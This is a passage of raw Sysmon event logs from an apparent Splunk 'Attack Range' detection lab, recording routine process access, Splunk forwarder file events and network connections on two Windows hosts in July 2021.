07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050465Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050464Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050463Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050462Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050461Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050460Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050459Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050458Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050457Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050456Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050455Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050454Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050453Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050452Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001050451Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:42.224{466BC892-02AF-60E8-0D00-00000000CF01}900376C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+c264|c:\windows\system32\rpcss.dll+d73e|c:\windows\system32\rpcss.dll+a35b|c:\windows\system32\rpcss.dll+f526|c:\windows\system32\rpcss.dll+121ba|c:\windows\system32\rpcss.dll+740c|C:\Windows\System32\RPCRT4.dll+64b8c|C:\Windows\System32\RPCRT4.dll+64979|C:\Windows\System32\RPCRT4.dll+64793|C:\Windows\System32\RPCRT4.dll+3f7d4|C:\Windows\System32\RPCRT4.dll+3fc51|C:\Windows\System32\RPCRT4.dll+1c39d|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001050468Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:43.870{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BABD8486E9396CE8313D28792F35326B,SHA256=E5A7763BAAE5F422F23D67A0D22A5DED49D347C5003D2087CCD00F147320E40C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808394Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:43.304{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E5AF7436957B1423A7B04644528F1C88,SHA256=9B10F996C7DB764411F7FF7E8BD57E8A806DF78A79E66877DEE903EF93E61267,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050470Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:44.888{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDF4F28F2E38C35DE44A3EDB811DD6E1,SHA256=3373A601E3994E9FDD9EB74EB0555CADFF9671C8525C8D53FE32A389BECE0D26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808395Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:44.351{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DF040CFB6FD1B403499DA75DCBBB7AC4,SHA256=F1211F505222D443E1435FF2F7AB443490B4557356FE351843F1F2DDF0160047,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050469Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:35.681{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51088-false10.0.1.12-8000- 23542300x80000000000000001050471Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:45.905{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F833798983FFE1B127C986BB97A9B3E0,SHA256=D0176E85DDE2F5B980D44A3F18413117CEF8206D058C729535FC84D3DA22272F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808396Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:45.351{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C107074E1C5605B1489C7DC72D884D8,SHA256=18B9A08E67314EA7804DC35D6E5FB752FB0BC5D18DD617FA480A5B66F29E55F2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050474Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:46.920{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8EE55F16DD9F21C305A653B5F47BBCAF,SHA256=6538AE4C0E1BA727BC237CF0461E9F0094DF84CA0373A4F68F7B3EC756428C39,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808397Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:46.398{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DCA574634A54870C81B0C839525ABDD6,SHA256=262209744733EC979B7EFCC1A93C24665F38BF18F7ECD506206264DC75F4AB8B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050473Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:46.851{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F6FF0F6EA5396604E86557A3C273834A,SHA256=959065E72C86E272C7DD0D3AFAEABAE960750208888BBC33957F6C0E11CD7280,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050472Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:46.851{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AE9C360C83C9126B9BFC86031716A60C,SHA256=18DADC74AA04B7592855A849188B0E9784B2FCBD048E4EB6D5C55BB3809F4678,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001050476Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:47.935{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6B4EC11C2051B5B49938C7D74FC6B517,SHA256=6DF486592D83543F8C80952078C5FD66A00BEF98679D1786837432519061E2D2,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000808399Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:46.218{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57323-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000808398Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:47.413{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=824DE9D7BB7F117FCB42E55AB19E7B97,SHA256=CBF3EBF5809950DE4F8605116E288BAFA7358B62966B1BDFED2F538BF7EB61CE,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001050475Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:38.807{466BC892-02AF-60E8-0F00-00000000CF01}360C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse191.96.168.180-61088-false10.0.1.14win-dc-890.attackrange.local3389ms-wbt-server 23542300x80000000000000001050477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:56:48.966{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A78AAEB51A1AC911A319AA048F98B729,SHA256=EC87C3257DF59136439A826224D44A1935DF3C6939A61E01DEA38427874C1E9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000808400Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:56:48.429{0C1E0330-0518-60E8-D300-00000000D001}380NT 